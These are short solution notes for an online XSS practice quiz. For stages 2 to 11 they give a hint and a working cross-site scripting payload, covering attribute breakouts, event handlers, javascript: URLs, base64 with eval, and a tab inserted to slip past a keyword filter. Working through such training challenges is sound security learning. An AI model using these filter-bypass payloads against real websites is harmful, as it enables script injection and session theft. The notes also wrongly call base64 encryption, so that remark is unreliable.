XSS detection
Experiment address: https://xss-quiz.int21h.jp/
stage2
"><script>alert(document.domain)</script>
stage3
Just select in Select
Japan</option><script>alert(document.domain);</script>
stage4
Change the input attribute,
"><script>alert(document.domain);</script>
stage5
Limit length
Change length
"><script>alert(document.domain);</script>
stage 6
Automatically translated into ISO 8859-1 character set, such as> entity name display>
" onmouseover=" alert(document.domain);
stage7
Join
" onmouseover= alert(document.domain)
stage8
Through URL
javascript:alert(document.domain);
stage9
Add to tag span
onclick="alert(document.domain)"
stage10
Encrypt part of the content with base64
"><script>eval(atob('YWxlcnQoZG9jdW1lbnQuZG9tYWluKTs='))</script>
Note: bases64 is reversible encryption
stage11
Special symbols sneak in
"><a href="javascr	ipt:alert(document.domain);">xss</a>